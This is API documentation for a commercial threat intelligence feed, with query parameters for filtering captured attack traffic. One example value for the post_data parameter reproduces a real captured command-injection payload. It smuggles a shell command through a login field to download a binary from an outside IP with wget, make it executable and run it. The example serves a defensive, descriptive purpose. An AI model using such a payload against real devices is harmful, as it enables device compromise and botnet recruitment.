Bad Packets® Cyber Threat Intelligence API (1.0.0)

Download OpenAPI specification:Download

Bad Packets® Cyber Threat Intelligence API provides a curated feed of exploit activity, malware payloads, and command-and-control servers used by threat actors. We also monitor emerging threats targeting IoT/ICS management systems, distributed computing environments, and other enterprise endpoints. Our feed is continuously updated with the latest indicators of compromise as new threats are detected.

Authentication

Authorization Token

Security Scheme Type API Key
Header parameter name: Authorization Token

ping

Endpoint for testing API key and authentication

Authorizations:

Responses

200

OK

403

Forbidden

get /ping
https://api.badpackets.net/v1/ping

Response samples

Content type
application/json
Copy
Expand all Collapse all
{
  • "success": true
}

query

Run a query that returns a filtered result from threat intelligence data

Authorizations:
query Parameters
source_ip_address
string
Example: source_ip_address=80.82.65.234

Host's IP address

target_port
integer
Example: target_port=8080

Port targeted

protocol
string
Example: protocol=tcp

Procotol used

user_agent
string
Example: user_agent=Welcome

User agent used

payload
string
Example: payload=POST /cgi-bin/mainfunction.cgi HTTP/1.1

Payload captured including Method, URI, and request type/version.

post_data
string
Example: post_data=action=login&keyPath=' /bin/sh${IFS}-c${IFS}'cd${IFS}/tmp${IFS}&&${IFS}busybox${IFS}wget${IFS}http://185.172.110.224/ab/arm7${IFS}&&chmod${IFS}777${IFS}arm7${IFS}&&${IFS}./arm7${IFS}bober' '&loginPwd=a&loginUser=a

POST data captured (when applicable)

country
string
Example: country=NL

ISO 3166-1 two letter country code

first_seen_before
string
Example: first_seen_before=2020-03-31T16:01:11Z

Timestamp of when the host was first observed in ISO 8601 format

first_seen_after
string
Example: first_seen_after=2020-03-31T16:01:11Z

Timestamp of when the host was first observed in ISO 8601 format

last_seen_before
string
Example: last_seen_before=2020-03-31T17:58:50Z

Timestamp of when the host was last observed in ISO 8601 format

last_seen_after
string
Example: last_seen_after=2020-03-31T17:58:50Z

Timestamp of when the host was last observed in ISO 8601 format

tags
string
Example: tags=CVE-2020-8515

Bad Packets® CTI tag

event_count
integer
Example: event_count=22

Count of events detected from a host

limit
integer [ 1 .. 1000 ]

Number of results per page

offset
integer

Number of records to skip, e.g. the record number to start at

Responses

200

OK

400

Invalid query

401

Unauthorized

403

Forbidden

get /query
https://api.badpackets.net/v1/query

Response samples

Content type
application/json
Copy
Expand all Collapse all
{}